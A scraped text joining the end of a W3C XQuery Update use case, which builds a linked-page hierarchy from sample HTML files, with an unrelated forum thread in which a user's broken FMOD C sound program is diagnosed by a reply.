<head><title>Section 1a</title></head> <body> <h1>Subsection</h1> <p>More of the same</p> <p>Back to the <a href="Documentation.html">index page</a></p> </body> </html> section2.html: <html> <head><title>Section 2</title></head> <body> <h1>Second</h1> <p>Summary of <a href="section1.html">section 1</a> and <a href="section1a.html">section 1a</a></p> <p>Back to the <a href="Documentation.html">index page</a></p> </body> </html> Return the document hierarchy omitting duplicates. Solution in the XQuery Update Facility: declare variable $prefix := "/html/"; declare variable $visited := <visited/>; declare function local:filetree($s as xs:string, $depth) { if ($depth < 5) then <level depth="{$depth}"> <file>{ $s }</file> { let $relname := concat($prefix, $s) let $doc := doc($relname) for $href in $doc//@href where contains($href,"htm") and not(contains($href,"http")) and (every $url in $visited/url satisfies $url != $href) return ( insert node <url>{ $href }</url> into $visited, <newcall>{ local:filetree($href, $depth+1) }</newcall> ) } </level> else () }; local:filetree("Documentation.html", 1) Expected result: <level depth="1"> <file> Documentation.html </file> <newcall> <level depth="2"> <file> section1.html </file> <newcall> <level depth="3"> <file> section1a.html </file> </level> </newcall> </level> </newcall> <newcall> <level depth="2"> <file> section2.html </file> </level> </newcall> </level>
http://www.w3.org/TR/xquery-update-30-requirements-use-cases/
CC-MAIN-2015-06
en
refinedweb
include <stdio.h> include <stdlib.h> if defined(WIN32) || defined(WATCOMC) #include <windows.h> #include <conio.h> include <math.h> else #include "../../api/inc/wincompat.h" endif include “../../api/inc/fmod.h” include “../../api/inc/fmod_errors.h” /* optional */ int main() { double samples[44099]; FSOUND_SAMPLE *mysample; //*************************************************** for (int i = 0; i < 44100; ++i) { samples[i] = (10000sin( 2(3.141592)880(i/44100.0)) ); } mysample = FSOUND_Sample_Alloc(FSOUND_FREE, 44100,FSOUND_NORMAL, 44100, 255, 128, 255); FSOUND_Sample_Upload(mysample,samples,FSOUND_NORMAL); FSOUND_PlaySound(FSOUND_FREE, mysample); //*************************************************** return 15; } This code doesn`t work why? - Byte_Junkie asked 13 years ago - You must login to post comments You haven’t studied the example programs why? 😆 But seriously, for a start you need to call FSOUND_Init at the start of your program and FSOUND_Close at the end. You can’t use double for the type of your sample data. Make it unsigned short if you intended to use 16bit samples. Finally, your program exits as soon as it’s called FSOUND_PlaySound. If you want to hear your sound you’ll have to wait for it to play by calling Sleep() or something after FSOUND_PlaySound. - Andrew Scott answered 13 years ago
http://www.fmod.org/questions/question/forum-7126/
CC-MAIN-2016-50
en
refinedweb
Clearance is now a Rails engine…BLAOW! Why Clearance has served us well for many months. Our only complaints were shared by others: - lots of includes - too much generated code - too many tests to maintain - sometimes awkward to override functionality With the re-institution of Rails engines in Rails 2.3, we decided to convert Clearance to engine. The process was relatively painless, the code is far cleaner, and we think we were able to scratch all our itches. Philosophy. Overriding. - Write your tests for whatever action you want to add or override. - Subclass one of Clearance’s controllers ( Users, Sessions, Passwords, and Confirmations). - Update your routes (by default, the routes will point to the namespaced Clearance controllers). The Royal Library of Alexandria All knowledge pertaining to Clearance can be found on its Github wiki, where you’ll find such articles as: - Upgrading to Rails engine - Organization of modules, routes, & flashes - Extending Clearance with usernames, admins, or invite codes .. and much more. Enjoy!
https://robots.thoughtbot.com/clearance-is-a-rails-engine
CC-MAIN-2016-50
en
refinedweb
0 Hi All, First time asking so go easy :-) I am doing c++ a few weeks now, i am doing questions in Project Euler to hopefully improve my coding, But as you will prob see below i am still very new and "Nieve"... Question is: The prime factors of 13195 are 5, 7, 13 and 29. What is the largest prime factor of the number 600851475143? My Issue: I am trying to get 5 as the first prime number by putting this in (if((digit > 5) && (digit%5) !=0)) but its not working, can anyone assist or am i maybe writing this whole code the wrong way as in should i use different methode/ loops etc? Below is my code so far: #include <iostream> using namespace std; void main(){ long long int number = 600851475143; long long int biggestPrime = 1; for(long long int digit = 1; digit<=number; ++digit){ if((digit%2) !=0 && (digit%3) !=0){ if((digit > 5) && (digit%5) !=0){ if((number%digit) == 0){ if(digit > biggestPrime){ biggestPrime = digit; cout << digit << endl; } } } } } cout << "Finished"; int dummy; cin >> dummy; } Any assistance would be greatly appreciated..... Edited 5 Years Ago by Narue: n/a
https://www.daniweb.com/programming/software-development/threads/379255/c-prime-number-program-issue
CC-MAIN-2016-50
en
refinedweb
Odoo Help This community is for beginners and experts willing to share their Odoo knowledge. It's not a forum to discuss ideas, but a knowledge base of questions and their answers. 1 Posts netherlands by activity date import bankstatement amro netherlands abn By• 3/16/15, 8:10 AM • 2,599 Views • 1 Answer Jeroen Hermans About This Community This community is for professionals and enthusiasts of our products and services. Read Guidelines
https://www.odoo.com/forum/help-1/tag/netherlands-3615/questions
CC-MAIN-2016-50
en
refinedweb
tag:blogger.com,1999:blog-12214002.post1833295658799464217..comments2016-11-30T04:43:07.744-05:00Comments on Let's Wreck This Together...with Oracle Application Express!: You shouldn't use Oracle Application Express because...Joel R. Kallman"Everything else is put in the naming convent..."Everything else is put in the naming conventions of packages and function. Again very ugly."<br /><br />Well, "ugly" is in the eye of the beholder. For example, the Win32 API is full of "ugliness" with strange conventions, inconsistent naming and general spaghetti, yet people manage to use it (either because they have to, or because it offers some other benefits).<br /><br />Trust me, there are worse conventions than having to name your items after the page they belong to...!<br /><br />And to me, Objective C looks really ugly -- its OO features don't tempt me, because I mostly work with data-driven applications, where PL/SQL's (non-OO) features are much more useful.<br /><br />Here are some of my thoughts on structuring PL/SQL code, in general and for use with Apex:<br /><br /><br /><br />With regard to Apex as a tool, the fact that you can create apps like the JSON-powered experiment you described, speaks to the strength and flexibility of Apex to make it whatever you need.<br /><br />So I say, leverage PL/SQL packages for data processing, and pick from Apex what you need in terms of authentication and authorization, session management, navigation and templates, Interactive Reports, Flash charts, auto DML (for those quick CRUD apps), and so on.<br /><br />- MortenMorten Braten Morten and thanks for your comment. We can d...Hello Morten and thanks for your comment. We can do what we want, but it's becoming very tricky. <br /><br / ... <br /><br />we should probably split the application in more and more packages, that way we would have less problems with multiple developers, but again it's not easy to do the split, when your apex application has dynamic dependencies on these packages.<br /><br />pl/sql has 3-level namespaces (schema.package.function), and we would like to keep the app code in one schema, so we're down to two levels. Everything else is put in the naming conventions of packages and function. Again very ugly.<br /><br /. <br /><br />Maybe we could use something like google's closure to do proper JS (with all the nice features of modern language) and let the db do what it does best, running it's pl/sql, and APEX acting as a thin (but highly configurable) layer in the middle....<br /><br /. <br /><br />As Joel said they are not targeting this kind of developers, a move in such a direction might not make much sense on a cost/benefit perspective.ʯɲʑɩʛʯɖʋɪʉ ɕɑʒʝɪɪʧʠʘɶ "Guy with strange Unicode name", It ...Hi "Guy with strange Unicode name",<br /><br /?<br /><br />Do you have any concrete examples of what type of complexity we are talking about here?<br /><br />I've worked on several business-critical applications written in PL/SQL, with up to 200,000 lines of code, and I've never had problems organizing the code using packages.<br /><br />(I've often found myself wishing that Oracle allowed object names with more than 30 characters, but you work your way around it.)<br /><br /.<br /><br />- Morten<br /><br />*.Morten Braten love APEX. You can do a lot of things with APEX....I love APEX. You can do a lot of things with APEX. It is very much scalable.<br /><br />There are some Tips and Tricks which will be helpful for developing APEX Applications and which you can master by experience and reading blogs from experts of APEX.<br /><br />Regards,<br /><br />Sohil Bhavsar.Sohil Bhavsar for your answer. Could you please shed some..?ʯɲʑɩʛʯɖʋɪʉ ɕɑʒʝɪɪʧʠʘɶ ʯɲʑɩʛʯɖʋɪʉ ɕɑʒʝɪɪʧʠʘɶ, Thanks for your comment...Hi ʯɲʑɩʛʯɖʋɪʉ ɕɑʒʝɪɪʧʠʘɶ,<br /><br /. <br /><br />If object-oriented programming fits your need, then you're correct - Application Express is probably not for you. And that's fine - it really isn't intended to be a solution for all problems.<br /><br /.<br /><br />Thanks again for your feedback, though. I truly appreciate the perspective.<br /><br />JoelJoel R. Kallman Joel, I agree that APEX is an excellent tool...Hello Joel,<br />I agree that APEX is an excellent tool and I think that it can go far beyond basic CRUD and it does scale in complexity - because there is less complexity.<br /><br />But as any other tool it has its weak points and in my opinion it's lack of source control. Unfortunately<br />current statement of direction is not promising - there is nothing about it.<br /><br />The biggest APEX application - is APEX itself. Could you share how Oracle team manages source code? Probably we are just missing something and there are efficient ways to manage code.<br /><br />Thanks,<br />LevUnknown comment has been removed by the author.Unknown, APEX 4.0.2 will ship with XE. JoelFlavio,<br /><br />APEX 4.0.2 will ship with XE.<br /><br />JoelJoel R. Kallman Joel. We have invested in APEX for the past ...<br /><br /.<br /><br />In my opinion APEX does have it's niche, where it performs (rapid development, ...) better than the competition, but our biggest problem is that it doesn't scale in COMPLEXITY. <br /><br />The reason for this is that it doesn't use, right at its core, basic "Object Oriented" concepts that have proved successful over the past 20 years in designing complex application: encapsulation, reuse, inheritance, ...<br /><br /.<br />.<br /><br /. <br /><br /.<br /><br /". <br /><br />Thanks for your timeʯɲʑɩʛʯɖʋɪʉ ɕɑʒʝɪɪʧʠʘɶ, which version of Apex are you going to ship ...Joel,<br />which version of Apex are you going to ship with XE 11g?<br /><br />FlavioByte64
http://joelkallman.blogspot.com/feeds/1833295658799464217/comments/default
CC-MAIN-2016-50
en
refinedweb
11-08-2010 08:00 PM Has anyone had any luck in setting the font of a control to a different color? In the control "Label" has an attribute "format" of the type TextFormat that has a "color" attribute, but it does not seen to do anything. Same with size. 11-09-2010 02:45 PM Yeah, I had to fiddle with it a bit to figure out the hierarchy of all the classes... but here's a snipet that should work for you. import qnx.ui.text.Label; /* A label in which to show the hello greeting. */ var helloLabel:Label = new Label(); helloLabel = new Label(); helloLabel.width = 800; helloLabel.height = 30; helloLabel.x = (stage.stageWidth - helloLabel.width) / 2; helloLabel.y = 60; var txtFormat:TextFormat = new TextFormat(); txtFormat.align = TextFormatAlign.CENTER; txtFormat.font = "Arial"; txtFormat.color = 0x103f10; txtFormat.size = 24; helloLabel.format = txtFormat; addChild(helloLabel); Regards Brent If I submitted something helpful, please give me a kudo. Thanks. 11-09-2010 02:51 PM Ah, no direct manipulation to the object. Counter intuitive. BB: Suggest the documentation be updated to reflext the issue (or better yet, allow for direct manipulation to cut down on the lines of code). 11-09-2010 03:04 PM That's the way Actionscript handles everything, so I doubt they would change it and make it inconsistent. 11-09-2010 03:19 PM Yes, it seems strange that the QNX Label which seems to support: helloLabel.format.color = 0x103f10; helloLabel.format.align = TextFormatAlign.CENTER; helloLabel.format.font = "Arial"; helloLabel.format.color = 0x103f10; helloLabel.format.size = 24; wouldn't work in this fashion. But I do notice that it doesn't have nearly the same class as the spark.components.Label or the old mx.components.Label (which wouldn't allow you to do the above anyway as they don't support the .format methods). I had thought the qnx. classes were meant to be completely portable between spark and qnx (except for the import) but it doesn't appear that they are. Regards Brent If my post was found to be helpful to you, please thank me with a Kudo. Thanks. 11-09-2010 03:30 PM ActionScript as a language not not prevent direct manipulation of an object, the implementation of the class defines the behavior. In this case, if the Label.format was not allocated (assumed), then allocating a TextFormat and setting it to format is required. If Label allocated format in its construction, then direct manipulation of the format's attributes is possible. Not the end of the world, just have to aware of it. This is similar the adding columns to a DataGrid. You cannot just push a new column to a DataGrid, you have to create your own array of columns, add them, and then set the DataGrids columns to this new array. 11-09-2010 03:39 PM To be in violent agreement with you, at least you can manipulate MX styles individually, for example: var label : Label = new Label(); label.setStyle( 'fontSize', 12 ); etc. Now, I was never a big fan of meta driven style manipulation since is requires the developer to know them by heart (or look up in the documentation) instead of having the IDE (FB4) prompt you as your type. I like that QNX Label has the format attribute, its just unfortunete that you can not just change one of its attributes without having to instantiate the whole format class. Again, not the end of the world. Just will extend to get the behavior I am looking for. 11-09-2010 03:55 PM Yeah, I would have thought that when you instantiated a Label class into its own object, you'd also end up with an "internal" TextFormat object but I guess they are trying to save space. Of course the benefit to instantiating your own TextFormat class is that you can use that one instance for many different objects (Label 1, Label 2, Text 1, Text 2, etc.). 11-09-2010 07:44 PM I ran into the label formatting problems earlier today. One way you can assign the formatting of a label is like this: var label:Label = new Label(); label.format = new TextFormat(null, null, "0xFFFFFF"); You're using the regular AS3 TextFormat class, which has a constructor signature that looks like this: TextFormat(font:String = null, size:Object = null, color:Object = null, bold:Object = null, italic:Object = null, underline:Object = null, url:String = null, target:String = null, align:String = null, leftMargin:Object = null, rightMargin:Object = null, indent:Object = null, leading:Object = null) So in my example I'm keeping the default font and size, I'm just overriding the color to make it white.
http://supportforums.blackberry.com/t5/Adobe-AIR-Development/CheckBox-and-other-controls-label-font-color-change/td-p/632344
CC-MAIN-2014-10
en
refinedweb
06 November 2008 07:30 [Source: ICIS news] SINGAPORE (ICIS news)--Jatropha would be commercially viable as the next major feedstock for biofuel production in two to three years, with plantations for the non-edible crop beginning to proliferate in southeast Asia and China, an industry consultant said. ?xml:namespace> “Many people are moving into the field, so there are more and more plantations that are happening in Indonesia, India, Philippines, Malaysia and China,” Temasek Life Science Laboratory director Hong Yan told ICIS news at the sidelines of the "Biofuels and Food Security” forum in Singapore. “Research for jatropha is currently at its infancy, but the potential is obviously there,” Hong said. Jatropha is a plant that produces seed with up to 40% oil content. Unlike palm, jathropa can grow on degraded soil as it is resistant to pests and harsh environmental conditions like drought. “Oil palm (plantations are limited to) much narrower geographic area, particular requirements for soil and involves use of agro-chemicals. Jatropha has fewer requirements and is not limited by geographic or soil,” he added, although conceding that the crop could not fully the popular biofuel feedstock. Temasek Life Science is currently in talks with biofuel industry big names for possible commercial venture, said Hong but he declined to elaborate. The forum organized in conjunction with the International Energy Week runs from 3-7
http://www.icis.com/Articles/2008/11/06/9169356/jatropha-biofuel-viable-in-2-3-years-consultant.html
CC-MAIN-2014-10
en
refinedweb
* Tam? | Is this good practice? It sounds good to me, at least. | It seems that my parser knows something about namespace... Nothing wrong with that, you just have to keep the different layers of the different specs separate in your mind (and parser :). | What will happen to XML 1.0 when the namespace specification becomes | a W3C recommendation? Good question. I don't really know. A reasonable guess would be that the SGML DTD syntax is ditched in favour of an XML-based syntax that is namespace-aware. Or that both are retained. Of course, this means that XML will have two different schema languages, only one of them SGML-compatible. But, like I say, this is just a guess. --Lars M.
https://mail.python.org/pipermail/xml-sig/1998-November/000518.html
CC-MAIN-2014-10
en
refinedweb
iNumReg Struct Reference This interface is used for ID -> iCelEntity* registers in the physical layer. More... #include <physicallayer/numreg.h> Detailed Description This interface is used for ID -> iCelEntity* registers in the physical layer. Currently, two implementations are available: - cel.numreg.lists (using arrays) This version is more effective if you don't care of the IDs used and if all the ID will be contiguous. This is usually the case of a server or a single app. - cel.numreg.hash (using hashs) This version is more effective if you want to allow any kind of ID used. This is usually the case of client apps. You can choose between these two implementations with the iCelPlLayer::ChangeNumReg function. Definition at line 41 of file numreg.h. Member Function Documentation Removes all objects from the registry. Returns the object with ID id from the list. Returns the size of the buffer (This is NOT the count of objects in the registry). It is the size of array if you use array implementation, the size of the hash otherwise. Registers an object in the registry and returns the new ID, in error case ID 0 is returned. Registers an object in the registry with the provided ID. You should call this function only if you are sure the ID isn't allocated yet. It is also advised to use the hash implementation for memory reasons. Removes a registered object from the registry (Note: this is slow, whatever the implementation you choose). Removes a registered object from the registry. The documentation for this struct was generated from the following file: Generated for CEL: Crystal Entity Layer 2.0 by doxygen 1.6.1
http://crystalspace3d.org/cel/docs/online/api-2.0/structiNumReg.html
CC-MAIN-2014-10
en
refinedweb
); } } I think you're on the right track since your code in the main method will do what you want it to do. However your instructions are contradictory: "SumOfN takes an int n as a parameter and returns the sum ofN" "Your program should loop, ask for n, if N > 0, Calculate and Print sumofN" Usually a method will either print something or return it. These instructions are unclear which they really want (or if they want both). You could do both I suppose. Just stuff your main code in the method you have and that would work. Just don't forget to return the value after you print it. As it stands you print out the answer, but the sumOfN method just returns the same number it is given. So it kind of halfway works. The thing is I don't know how to write the code for the method to take the user input, calculate and see if it is 0 and then stop the program or calculate if the answer is 5, get the sum 5 + 4 + 3 + 2 + 1 + 0, could you maybe show me some code that would do this? thanks a bunch. First of, there is a very quick and very clean way to calculate the SumOfN. in your example you used 5, which results iun the SumOfN being 1+2+3+4+5=15. This is the hard way of doing things. the fast way (which only works on even numbers, but I'll give a fix for that later) would be: n=4; // sumOfN: 1+2+3+4=10 sumOfN=(n/2)*(n+1); This works because: 1+4 = 5 (n+1) 2+3 = 5 (n+1) This combination can be made n/2 times. now, to make this work with odd numbers as well is very straightforward: n=5; // SumOfN: 1+2+3+4+5=15 sumOfN=(((n-1)/2)*n)+n; this works because: 1+4 = 5 (n) 2+3 = 5 (n) this combination can be made (n-1)/2 times (twice in this case). You can check if an int is odd by doing: if ((i%2) == 1) { } the % gives you the remainder after dividing by 2, which in case of an odd number would be 1. Now in you case, this calculation would take place in your sumOfN method, which would take theint as parameter and return the calculated value. But still how do I put it into method SumOfN and then Calculate it in SumOfN and then Pull it out of SUmOfN to be printed? that's what I can't figure out, is how to call the method sumOfN, put all the calculations in sumofN to print it out? private static int sumofn(int n) { int sum = 0; // do the calculating here; return sum; } System.out.println(sumofn(5)); I still keep getting errors that the main cannot read sumofn, and it's not reading the user input, can anyone find my flaws import java.util.*; public class sumOfN { //Method private static int sumofn(int n) { int count = 0; int sum = 0; for (count = n; count > 0; count--) { sum += count; if (n <= 0) { System.out.println("Cannot equal 0"); return sum; } } return sum; } public static void main(String[] args) { Scanner stdin = new Scanner(System.in); System.out.println("Please enter an integer: "); sumofn = stdin.nextInt(); System.out.println("SumOfN" + sumofn(n) + " has an integer value of "); } I've never done an input this way before myself, so I can't help you there. The problem why the main can't read the sumOfN method is because it is private and you have put it in a different class then your main method. if you make it public, that should solve the problem. (This is my fault I see, cause I made it private in my example). making a static method private makes no sence though, since static is always called from outside the class itself. Forum Rules Development Centers -- Android Development Center -- Cloud Development Project Center -- HTML5 Development Center -- Windows Mobile Development Center
http://forums.devx.com/showthread.php?140642-Help-With-parameter-passing&p=416531
CC-MAIN-2014-10
en
refinedweb